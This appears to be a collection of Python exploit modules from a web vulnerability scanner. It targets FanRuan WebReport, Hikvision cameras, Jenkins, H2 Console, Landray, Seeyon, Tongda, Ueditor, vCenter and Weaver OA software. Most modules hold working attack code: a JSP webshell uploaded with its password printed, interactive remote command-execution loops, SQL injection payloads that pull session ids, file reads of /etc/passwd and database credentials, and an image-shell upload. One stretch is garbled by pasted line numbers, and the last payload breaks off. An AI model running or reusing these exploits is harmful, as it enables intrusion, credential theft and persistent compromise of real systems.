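    shell = '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>'
    payload = '/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp'
    timeout = 20
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible, MSIE 9.0, Windows NT 6.1, Trident/5.0)',
        'Content-Type': 'text/xml;charset=UTF-8',
    }
    vurl = urllib.parse.urljoin(url, payload)
    data = {
        "__CONTENT__": shell,
        "__CHARSET__": "UTF-8",
    }
    webshell = urllib.parse.urljoin(url, '/WebReport/update.jsp')
    print('[+] Exploit loading ......')
    time.sleep(3)  # cosmetic pause, kept from the original
    try:
        print('[+] 尝试上传冰蝎webshell ')
        rep = requests.post(vurl, headers=headers, timeout=timeout, json=data, verify=False)
        print('[+] 上传完毕,正在检测webshel是否成功?')
        if rep.status_code != 200:
            return False
        rep2 = requests.get(webshell, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False)
        if rep2.status_code == 200:
            print('[*] status_code: 200 , 上传成功!')
            print('[*] webshell(冰蝎):', webshell)
            print('[*] 密码: rebeyond')
            return True
        return False
    except Exception:
        return False


# --- /pocs/web/h2database/h2console_unauth.py ---
import re
import urllib.parse

import requests


def verify(url):
    """Report an exposed H2 Database Console login page.

    Only checks that ``/h2-console/login.jsp`` answers 200 with both
    ``Welcome to H2`` and ``H2 Console`` in the body. Despite the name
    (未授权访问) this proves exposure of the console, not that a login
    succeeds — that still depends on the JDBC URL / credentials accepted.

    Returns:
        Result dict with ``vulnerable``/``vurl`` set on a match.
    """
    result = {
        'name': 'H2-Database-Console 未授权访问',
        'vulnerable': False,
        'attack': False,
        'about': 'https://blog.csdn.net/weixin_45366453/article/details/125525496, https://blog.csdn.net/zy15667076526/article/details/111413979'
    }
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
    }
    vurl = urllib.parse.urljoin(url, '/h2-console/login.jsp')
    try:
        rep = requests.get(vurl, headers=headers, verify=False, timeout=timeout)
        exposed = (
            rep.status_code == 200
            and re.search('Welcome to H2', rep.text)
            and re.search('H2 Console', rep.text)
        )
        if exposed:
            result['vulnerable'] = True
            result['vurl'] = vurl
    except Exception:
        pass
    return result


# --- /pocs/web/hikvision/CVE_2017_7921.py ---
import re
import urllib.parse

import requests


def verify(url):
    """CVE-2017-7921: Hikvision backdoor ``auth=`` parameter (unauthenticated access).

    ``auth=YWRtaW46MTEK`` is base64 of ``admin:11\\n``. After a loose
    fingerprint (the root page carries an ETag header) the probe requests
    ``/Security/users`` with that parameter; a 200 whose body mentions
    ``hikvision.com`` is treated as the user list being disclosed.

    Returns:
        Result dict; ``vulnerable``/``verify`` set on a match.
    """
    result = {
        'name': '海康威视 未授权访问(CVE-2017-7921)',
        'vulnerable': False,
        'url': url,
        'attack': True,
        # The original concatenated the two references without a separator
        # ("...html" "https://..."); joined with ", " like the other plugins.
        'about': 'https://www.likecs.com/show-438911.html, https://github.com/WormChickenWizard/hikvision-decrypter',
    }
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl1 = urllib.parse.urljoin(url, '/Security/users?auth=YWRtaW46MTEK')
    try:
        finger_rep = requests.get(url, headers=headers, verify=False, timeout=timeout)
        # The original indexed headers['ETag'] and relied on the KeyError
        # falling into its bare except; make the fingerprint gate explicit.
        if not finger_rep.headers.get('ETag'):
            return result
        rep1 = requests.get(vurl1, timeout=timeout, headers=headers, verify=False)
        # '.+' only asserts a non-empty body (possibly a tag pattern lost in
        # this listing — TODO confirm against upstream).
        if rep1.status_code == 200 and re.search('.+', rep1.text) and re.search('hikvision.com', rep1.text):
            result['vulnerable'] = True
            result['verify'] = vurl1
    except Exception:
        pass
    return result


def _fetch_and_report(label, target, headers, timeout):
    """GET ``target``, print the real status and size, return the response or None.

    The original printed "status: 200" unconditionally and, on a transport
    error, dereferenced the never-assigned response inside its except clause
    (NameError), which aborted the remaining downloads.
    """
    print(label, target)
    try:
        rep = requests.get(target, timeout=timeout, headers=headers, verify=False)
    except requests.RequestException as exc:
        print('[-] status: ', exc)
        return None
    print('[*] status: {0}, size: '.format(rep.status_code), len(rep.text))
    return rep


def attack(url):
    """Pull the user list, a snapshot and the configuration file via the backdoor parameter.

    Each URL is fetched independently; a failure on one does not stop the
    others. The decrypter hint is printed only when the configuration file
    actually came back with 200 (the original printed it on any non-exception).

    Returns:
        True when the loop ran to completion, False on an unexpected error.
    """
    timeout = 10
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl1 = urllib.parse.urljoin(url, '/Security/users?auth=YWRtaW46MTEK')
    vurl2 = urllib.parse.urljoin(url, '/onvif-http/snapshot?auth=YWRtaW46MTEK')
    vurl3 = urllib.parse.urljoin(url, '/System/configurationFile?auth=YWRtaW46MTEK')
    try:
        print('[+] 尝试未授权访问配置文件......')
        _fetch_and_report('[+] Try get :', vurl1, headers, timeout)
        _fetch_and_report('[+] Try get:', vurl2, headers, timeout)
        rep3 = _fetch_and_report('[+] Try get:', vurl3, headers, timeout)
        if rep3 is not None and rep3.status_code == 200:
            print('[*] 检测到配置文件存在,可从 https://github.com/WormChickenWizard/hikvision-decrypter 下载解密工具进行登录!')
        return True
    except Exception:
        return False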
Firefox/78.0', 18 | 'X-Requested-With': 'XMLHttpRequest', 19 | 'Content-Type': 'application/x-www-form-urlencoded', 20 | } 21 | payload = '' \ 22 | '' \ 23 | '$({0}>webLib/cmd.txt)' \ 24 | ''.format(cmd) 25 | vurl = urllib.parse.urljoin(url, '/SDK/webLanguage') 26 | verify_url = urllib.parse.urljoin(url, '/cmd.txt') 27 | try: 28 | finger_rep = requests.get(url, headers=headers, verify=False, timeout=timeout) 29 | if len(finger_rep.headers['ETag']) > 0: 30 | rep = requests.put(vurl, timeout=timeout, verify=False, headers=headers, data=payload.encode('utf-8')) 31 | rep2 = requests.get(verify_url, timeout=timeout, verify=False, headers=headers) 32 | if rep.status_code == 500 and rep2.status_code == 200 and re.search(randstr, rep2.text): 33 | relsult['vulnerable'] = True 34 | relsult['verify'] = verify_url 35 | return relsult 36 | except: 37 | return relsult 38 | 39 | def attack(url): 40 | timeout = 5 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0', 43 | 'X-Requested-With': 'XMLHttpRequest', 44 | 'Content-Type': 'application/x-www-form-urlencoded', 45 | } 46 | vurl = urllib.parse.urljoin(url, '/SDK/webLanguage') 47 | verify_url = urllib.parse.urljoin(url, '/cmd.txt') 48 | print('[+] Exploit loading......') 49 | try: 50 | cmd = '' 51 | while cmd != 'exit': 52 | cmd = input('[+] 执行命令 > ') 53 | payload = '' \ 54 | '' \ 55 | '$({0}>webLib/cmd.txt)' \ 56 | ''.format(cmd) 57 | rep = requests.put(vurl, timeout=timeout, verify=False, headers=headers, data=payload.encode('utf-8')) 58 | rep2 = requests.get(verify_url, timeout=timeout, verify=False, headers=headers) 59 | print('[*] Output:', rep2.text) 60 | 61 | return True 62 | except: 63 | return False 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | -------------------------------------------------------------------------------- /pocs/web/jenkins/CVE_2018_1000861.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 
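import re
import urllib.parse
import binascii

_CHECK_SCRIPT = '/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'
_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
}


def _script_params(cmd):
    """Query params for checkScript: a Groovy class whose constructor runs *cmd*.

    The command is hex-encoded and decoded Jenkins-side, so quotes in *cmd*
    cannot break out of the Groovy source.
    """
    hexcmd = binascii.hexlify(cmd.encode('utf-8')).decode('utf-8')
    payload = 'public class x{public x(){new String("%s".decodeHex()).execute()}}' % hexcmd
    return {'sandbox': True, 'value': payload}


def verify(url):
    """Fingerprint Jenkins, then submit a `whoami` script to checkScript.

    NOTE(review): a 200 from checkScript only shows the endpoint accepted the
    script without authentication; it is not proof that the command ran, so
    confirm with an out-of-band (dnslog) command via attack(). The probe
    itself executes `whoami` on the target, so verify() is not side-effect free.
    """
    result = {
        'name': 'Jenkins远程命令执行漏洞(CVE-2018-1000861)',
        'vulnerable': False,
        'attack': True,
    }
    try:
        # verify=False for consistency with the rest of the suite; the original
        # left TLS verification on, so self-signed instances failed silently.
        req = requests.get(url, headers=_HEADERS, timeout=4, verify=False)
        if req.status_code == 200 and re.search('Jenkins', str(req.headers)) and re.search('adjuncts', req.text):
            vurl = urllib.parse.urljoin(url, _CHECK_SCRIPT)
            probe = requests.get(vurl, headers=_HEADERS, timeout=5, verify=False)
            if probe.status_code != 404:
                rep = requests.get(vurl, params=_script_params('whoami'), headers=_HEADERS, timeout=5, verify=False)
                if rep.status_code == 200:
                    result['vulnerable'] = True
                    result['url'] = url
                    result['about'] = 'https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py'
        return result
    except requests.RequestException:
        return result


def attack(url):
    """Blind command loop: every line typed is sent as a Groovy script; no output is returned."""
    try:
        vurl = urllib.parse.urljoin(url, _CHECK_SCRIPT)
        print('[+] 开始执行命令, 输入exit退出!')
        while True:
            cmd = input('[+] 执行命令(无回显) >')
            # Original tested the sentinel after sending it, so 'exit' was run on the target.
            if cmd == 'exit':
                break
            rep = requests.get(vurl, params=_script_params(cmd), headers=_HEADERS, timeout=10, verify=False)
            if rep.status_code == 200:
                print('[*] 命令执行成功,请用dnslog验证!')
            else:
                print('[-] 未知错误,请到dnslog检查是否有回显?')
        return True
    except Exception:
        return False

# --------------------------------------------------------------------------------
# /pocs/web/landray/landray_oa_custom_jsp_fileread.py
# --------------------------------------------------------------------------------
import requests
import urllib.parse
import re


def verify(url):
    """Probe custom.jsp for a file:// read: /etc/passwd first, win.ini if that misses."""
    result = {
        'name': '蓝凌OA custom.jsp 任意文件读取漏洞',
        'vulnerable': False,
        'url': url,
        'attack': True,
        'about': 'https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw',
    }
    timeout = 3
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, '/sys/ui/extend/varkind/custom.jsp')
    linux_probe = 'var={"body":{"file":"file:///etc/passwd"}}'
    windows_probe = 'var={"body":{"file":"file:///c://windows/win.ini"}}'
    try:
        finger = requests.get(vurl, headers=headers, verify=False, timeout=timeout, data=linux_probe)
        if finger.status_code == 500 and re.search('/sys/ui/extend/', finger.text):
            rep1 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=linux_probe)
            if rep1.status_code == 200 and re.search('root:.*:0:0', rep1.text):
                result['vulnerable'] = True
                result['os'] = 'linux'
                result['vurl'] = vurl
            else:
                rep2 = requests.post(vurl, headers=headers, verify=False, timeout=timeout, data=windows_probe)
                # Bug fix: the original searched rep1.text here, so a Windows
                # host could never be flagged.
                if rep2.status_code == 200 and re.search('for 16-bit app support', rep2.text):
                    result['vulnerable'] = True
                    result['os'] = 'windows'
                    result['vurl'] = vurl
        return result
    except requests.RequestException:
        return result

# --------------------------------------------------------------------------------
# /pocs/web/seeyon/seeyon_a6_sqli.py
# --------------------------------------------------------------------------------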
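import re
import requests
import urllib.parse

# md5('1234'): every payload asks the database to compute it, so finding it
# in the response is a low-impact proof of injection.
_MD5_1234 = '81dc9bdb52d04dc20036dbd8313ed055'
_PAYLOADS = [
    '/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5(1234),1%23',
    '/common/js/menu/test.jsp?doType=101&S1=SeLeCt%20Md5(1234)',
    '/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27AnD%20(SeLeCt%201%20FrOm%20(SeLeCt%20CoUnT(*),CoNcaT(Md5(1234),FlOoR(RaNd(0)*2))x%20FrOm%20InFoRmAtIoN_ScHeMa.TaBlEs%20GrOuP%20By%20x)a)%23',
    "/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1'UnIoN%20AlL%20SeLeCt%20NULL,Md5(1234),NULL,NULL%23",
    '/ext/trafaxserver/SendFax/resend.jsp?fax_ids=(1)%20AnD%201=2%20UnIon%20SeLeCt%20Md5(1234)%20--',
]


def verify(url):
    """Try each injection point in turn; stop at the first that echoes md5('1234')."""
    result = {
        'name': '致远OA A6 sql注入漏洞',
        'vulnerable': False
    }
    try:
        for payload in _PAYLOADS:
            vurl = urllib.parse.urljoin(url, payload)
            try:
                req = requests.get(vurl, timeout=2)
            except requests.RequestException:
                continue
            # The second pattern catches a hash truncated by the page template.
            if _MD5_1234 in req.text or '52d04dc20036dbd8' in req.text:
                result['vulnerable'] = True
                result['url'] = url
                result['payload'] = vurl
                result['about'] = 'https://www.cnblogs.com/AtesetEnginner/p/12106741.html'
                return result
        return result
    except Exception:
        return result

# --------------------------------------------------------------------------------
# /pocs/web/seeyon/seeyon_get_sessionslist.py
# --------------------------------------------------------------------------------
import requests
import re
import urllib.parse


def verify(url):
    """GET getSessionList.jsp?cmd=getAll and look for 32-char upper-hex session ids.

    Any id returned is a live, credential-equivalent session: record the
    finding, not the ids. The regex also matches any other 32-character
    upper-case run on a 200 page, so confirm hits by eye.
    """
    result = {
        'name': '致远OA Session泄漏漏洞(后台可getshell)',
        'url': url,
        'vulnerable': False,
        'attack': False,
        'about': 'https://www.zhihuifly.com/t/topic/3345, https://www.seebug.org/vuldb/ssvid-93312'
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    vurl = urllib.parse.urljoin(url, '/yyoa/ext/https/getSessionList.jsp?cmd=getAll')
    try:
        req = requests.get(vurl, headers=headers, timeout=3)
    except requests.RequestException:
        return result
    if req.status_code == 200 and re.search('[0-9A-Z]{32}', req.text):
        result['vulnerable'] = True
        result['vurl'] = vurl
    return result

# --------------------------------------------------------------------------------
# /pocs/web/seeyon/seeyon_oa_a8_htmlofficeservlet_getshell.py
# --------------------------------------------------------------------------------
import requests
import re
import urllib.parse


def verify(url):
    """Fingerprint-only check: does /seeyon/htmlofficeservlet answer with its DBSTEP banner?

    This proves the servlet is exposed, not that an upload succeeds; treat a
    hit as "needs manual confirmation" rather than confirmed getshell.
    """
    result = {
        'name': '致远 OA A8 htmlofficeservlet getshell 漏洞',
        'vulnerable': False
    }
    try:
        vurl = urllib.parse.urljoin(url, '/seeyon/htmlofficeservlet')
        req = requests.get(vurl, timeout=3)
        if re.search('DBSTEP', req.text) and re.search('htmoffice', req.text):
            result['vulnerable'] = True
            result['url'] = url
            result['payload'] = vurl
            result['about'] = 'http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/'
        return result
    except requests.RequestException:
        return result

# --------------------------------------------------------------------------------
# /pocs/web/seeyon/seeyon_thirdpartycontroller_getshell.py
# --------------------------------------------------------------------------------
import requests
import re
import urllib.parse


def verify(url):
    """POST the fixed 'enc' blob to thirdpartyController.do and see whether a session is issued.

    A JSESSIONID in the reply is a logged-in session (credential material);
    it is not stored in the result on purpose.
    """
    result = {
        'name': '致远OA Session泄露(thirdpartyController.do)',
        'url': url,
        'vulnerable': False,
        'attack': True,
        'about': 'https://www.cnblogs.com/nul1/p/14749349.html, https://blog.csdn.net/maverickpig/article/details/118916085'
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    }
    data = 'method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1'
    vurl = urllib.parse.urljoin(url, '/seeyon/thirdpartyController.do')
    try:
        req = requests.post(vurl, headers=headers, timeout=3, data=data, verify=False)
    except requests.RequestException:
        return result
    # .get(): a reply without Set-Cookie used to raise KeyError under the bare except.
    cookie = req.headers.get('Set-Cookie', '')
    if req.status_code == 200 and 'seeyon' in cookie and 'JSESSIONID' in cookie:
        result['vulnerable'] = True
        result['vurl'] = vurl
    return result

# --------------------------------------------------------------------------------
# /pocs/web/tongda/tongda_sqli_getdata_php.py
# --------------------------------------------------------------------------------
import requests
import re
import urllib.parse

_ENDPOINT = '/general/reportshop/utils/get_datas.php'
# Union query pulling uid,sid from user_online; a hit is a live session id.
_PAYLOAD = r'''?USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5%20whe\re%201={`\=%27`%201}%20un\ion%20(s\elect%20uid,sid%20fr\om%20user_online%20whe\re%201\={`=`%201})--%20%27'''


def verify(url):
    """Fingerprint get_datas.php, then run the user_online union query.

    A 26-char lowercase alphanumeric run in the reply is taken as a session
    id. Those are credentials: keep them out of logs beyond the result dict.
    """
    result = {
        'name': '通达OA sql注入(/general/reportshop/utils/get_datas.php)',
        'vulnerable': False,
        'url': url,
        'about': 'https://forum.butian.net/share/278',
    }
    timeout = 3
    base = urllib.parse.urljoin(url, _ENDPOINT)
    vurl = urllib.parse.urljoin(url, _ENDPOINT + _PAYLOAD)
    try:
        finger = requests.get(base, timeout=timeout, verify=False)
        if finger.status_code == 200 and re.search("未指定业务", finger.text):
            rep = requests.get(vurl, timeout=timeout, verify=False)
            if rep.status_code == 200 and re.search("[a-z0-9]{26}", rep.text):
                result['vulnerable'] = True
                result['vurl'] = vurl
        return result
    except requests.RequestException:
        return result

# --------------------------------------------------------------------------------
# /pocs/web/tongda/tongda_videofile_fileread.py
# --------------------------------------------------------------------------------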
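import requests
import urllib.parse
import re


def verify(url):
    """Read inc/oa_config.php through video_file.php's MEDIA_DIR traversal.

    oa_config.php holds database credentials: a hit is sensitive data, not
    just a fingerprint.
    """
    result = {
        'name': '通达OA v2017 video_file.php 任意文件下载漏洞',
        'vulnerable': False,
        'url': url,
        'about': 'http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20video_file.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    vurl = urllib.parse.urljoin(url, '/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php')
    try:
        res = requests.get(vurl, headers=headers, timeout=3, verify=False)
    except requests.RequestException:
        return result
    # Raw strings: the original's '\$' and '\(' were invalid escapes in plain
    # strings (SyntaxWarning on 3.12+). The patterns themselves are unchanged.
    root_path = re.search(r'\$ROOT_PATH=getenv\("DOCUMENT_ROOT"\);', res.text)
    attach_path = re.search(r'\$ATTACH_PATH=\$ROOT_PATH\."attachment/";', res.text)
    if res.status_code == 200 and root_path and attach_path:
        result['vulnerable'] = True
        result['vurl'] = vurl
    return result

# --------------------------------------------------------------------------------
# /pocs/web/ueditor_1433_parsing_vulnerabilitly.py
# --------------------------------------------------------------------------------
#!/usr/bin/env python
# coding=utf-8
import requests
import re
import urllib.parse

_CATCH = '/ueditor/net/controller.ashx?action=catchimage'
# Probe image: the target fetches it from baidu.com, i.e. verify() causes an
# outbound connection from the target and leaves a copy stored as ".aspx".
_TEST_PNG = 'https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png?1=1.aspx'
_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
    'Content-Type': 'application/x-www-form-urlencoded',
}


def _catch(vulurl, source):
    """POST source[]=<source> to catchimage; return (payload, stored_path_or_None)."""
    payload = r'source[]={0}'.format(source)
    req = requests.post(url=vulurl, headers=_HEADERS, timeout=3, verify=False, data=payload)
    match = re.search(r'"url":"(.*)"', req.text)
    return payload, (match.group(1) if match else None)


def verify(url):
    """Check the catchimage handler exists, then make it fetch and store the probe PNG."""
    result = {
        'name': 'Ueditor编辑器1.4.3.3 解析漏洞',
        'vulnerable': False,
        'attack': True,
    }
    try:
        vulurl = urllib.parse.urljoin(url, _CATCH)
        req = requests.get(vulurl, timeout=3, verify=False)
        if re.search(r'没有指定抓取源', req.text):
            payload, upload_path = _catch(vulurl, _TEST_PNG)
            if upload_path is not None:
                result['vulnerable'] = True
                result['url'] = url
                result['method'] = 'POST'
                result['vulurl'] = vulurl
                result['position'] = 'data'
                result['payload'] = payload
                result['verify'] = urllib.parse.urljoin(vulurl, upload_path)
                result['about'] = 'https://www.cnblogs.com/hei-zi/p/13394764.html'
        return result
    except requests.RequestException:
        return result


def attack(url):
    """Have the target fetch an operator-hosted image shell and print where it was stored."""
    try:
        print('\n[+] 正在加载 Ueditor编辑器1.4.3.3 解析漏洞EXP模块......')
        print('[+] 请上传aspx图片马到自己的公网服务器')
        png_path = input('[+] 输入aspx图片马的地址:') + '?1=1.aspx'
        vulurl = urllib.parse.urljoin(url, _CATCH)
        _, upload_path = _catch(vulurl, png_path)
        if upload_path is None:
            return False
        print('[@] 上传成功!!!')
        print('[+] Webshell地址:', urllib.parse.urljoin(vulurl, upload_path))
        return True
    except Exception:
        return False

# --------------------------------------------------------------------------------
# /pocs/web/vmware/CVE_2021_21972.py
# --------------------------------------------------------------------------------
import requests
import urllib.parse
import re


def verify(url):
    """Heuristic check for CVE-2021-21972: the vROps plugin upload endpoint answering 405 to GET.

    NOTE(review): the fingerprint only requires a non-empty body from
    /sdk/vimServiceVersions.xml, and a 405 shows the endpoint is routed,
    not that an upload succeeds. Treat a hit as "likely", confirm manually.
    """
    result = {
        'name': 'CVE-2021-21972 vSphere Client RCE',
        'vulnerable': False,
        'url': url,
        'about': 'https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC/blob/main/CVE-2021-21972.py, https://github.com/0xAgun/CVE-2021-40870/blob/main/poc.py'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0',
        "Content-Type": "application/x-www-form-urlencoded"
    }
    timeout = 3
    vurl = urllib.parse.urljoin(url, '/ui/vropspluginui/rest/services/uploadova')
    finger_url = urllib.parse.urljoin(url, '/sdk/vimServiceVersions.xml')
    try:
        finger = requests.get(finger_url, headers=headers, timeout=timeout, verify=False)
        if finger.text:
            rep = requests.get(vurl, headers=headers, timeout=timeout, verify=False)
            if rep.status_code == 405 and 'Method Not Allowed' in rep.text:
                result['vulnerable'] = True
        return result
    except requests.RequestException:
        return result

# --------------------------------------------------------------------------------
# /pocs/web/weaver/CNVD_2019_32204.py
# --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
# Weaver OA BeanShell servlet remote code execution, CNVD-2019-32204
# Fofa: app="泛微-协同办公OA"
import requests
import sys
import re
import urllib.parse


def verify(target):
    """POST a BeanShell script that runs `whoami`; raw, HTML-free output marks the target.

    The probe executes a command on the target, so verify() is not side-effect free.
    """
    result = {
        'name': '泛微OA Bsh 远程代码执行漏洞 CNVD-2019-32204',
        'vulnerable': False
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = urllib.parse.urljoin(target, "weaver/bsh.servlet.BshServlet")
    # \\u0065\\u0078\\u0065\\u0063 reaches BeanShell as \u0065... and decodes to "exec".
    payload = """bsh.script=\\u0065\\u0078\\u0065\\u0063("whoami");&bsh.servlet.output=raw"""
    try:
        requests.packages.urllib3.disable_warnings()
        request = requests.post(headers=headers, url=target, data=payload, timeout=5, verify=False)
    except requests.RequestException:
        return result
    body = request.text
    # Bug fix: the original additionally required `"" not in body`, which can
    # never hold ('' is a substring of every string), so no target was ever
    # flagged. That literal was probably damaged in this listing; the other
    # conditions are kept exactly as they were.
    if ';' not in body and re.search('BeanShell', body) and 'Login.jsp' not in body and 'Error' not in body:
        result['vulnerable'] = True
        result['url'] = target
        result['method'] = 'POST'
        result['payload'] = payload
        result['about'] = 'https://www.cnblogs.com/yyhuni/p/14544814.html, https://blog.csdn.net/dust_hk/article/details/101621462'
    return result

# --------------------------------------------------------------------------------
# /pocs/web/weaver/CNVD_2019_34241.py
# --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
# Weaver OA WorkflowCenterTreeData SQL injection (Oracle backends only), CNVD-2019-34241
# Fofa: app="泛微-协同办公OA"

import requests
import urllib.parse
import re
import time

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Content-Type': 'application/x-www-form-urlencoded'
}


def verify(url):
    """Inject a union over v$parameter through formids; a JSON array reply marks the target.

    The payload (continued on the following line) pads with %0a%0d runs to
    slip past the length/keyword filter described in the reference.
    """
    relsult = {
        'name': '泛微OA WorkflowCenterTreeData接口注入(限oracle数据库)',
        'vulnerable': False
    }
    target = urllib.parse.urljoin(url, 'mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333')
    payload = \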
"formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0